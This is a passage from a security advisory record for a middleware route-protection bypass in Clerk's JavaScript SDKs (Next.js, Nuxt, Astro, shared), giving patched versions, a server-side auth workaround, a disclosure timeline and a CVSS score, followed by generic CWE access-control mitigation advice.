createRouteMatcher([\u0027/docs(.*)\u0027]);\n\nexport default clerkMiddleware(async (auth, req) =\u003e {\n if (!isPublicRoute(req)) {\n await auth.protect();\n }\n});\n```\n\n`@clerk/shared` is usually not imported directly in application code, but if you import `createPathMatcher` from an affected `@clerk/shared` version, you are also affected. Run `npm why @clerk/shared` (or your package manager\u0027s equivalent) to check your installed version.\n\n## Recommended actions\n\nInstall the patched version for your framework (pick the one matching your current major):\n\n**`@clerk/nextjs`**\n- v7.x: fixed in `7.2.1`\n- v6.x: fixed in `6.39.2`\n- v5.x: fixed in `5.7.6`\n\n**`@clerk/nuxt`**\n- v2.x: fixed in `2.2.2`\n- v1.x: fixed in `1.13.28`\n\n**`@clerk/astro`**\n- v3.x: fixed in `3.0.15`\n- v2.x: fixed in `2.17.10`\n- v1.x: fixed in `1.5.7`\n\n**`@clerk/shared`**\n- v4.x: fixed in `4.8.1`\n- v3.x: fixed in `3.47.4`\n- v2.x: fixed in `2.22.1`\n\n## Workaround\n\nIf you cannot upgrade immediately, adding server-side auth checks (`auth()`) inside your route handlers, server components, or server actions provides defense-in-depth against this bypass.\n\n## Timeline\n\nThis issue was reported on 13 APR 2026, patched on 15 APR 2026, and publicly disclosed on 15 APR 2026.\n\nThanks to [Christiaan Swiers](https://github.com/YouGina) for the responsible disclosure of this vulnerability.",
"id": "GHSA-vqx2-fgx2-5wq9",
"modified": "2026-04-27T16:08:38Z",
"published": "2026-04-16T21:28:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/clerk/javascript/security/advisories/GHSA-vqx2-fgx2-5wq9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41248"
},
{
"type": "PACKAGE",
"url": "https://github.com/clerk/javascript"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Official Clerk JavaScript SDKs: Middleware-based route protection bypass"
}
Mitigation
- Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
- Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].
Mitigation MIT-4.4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
- For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
- One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.
No CAPEC attack patterns related to this CWE.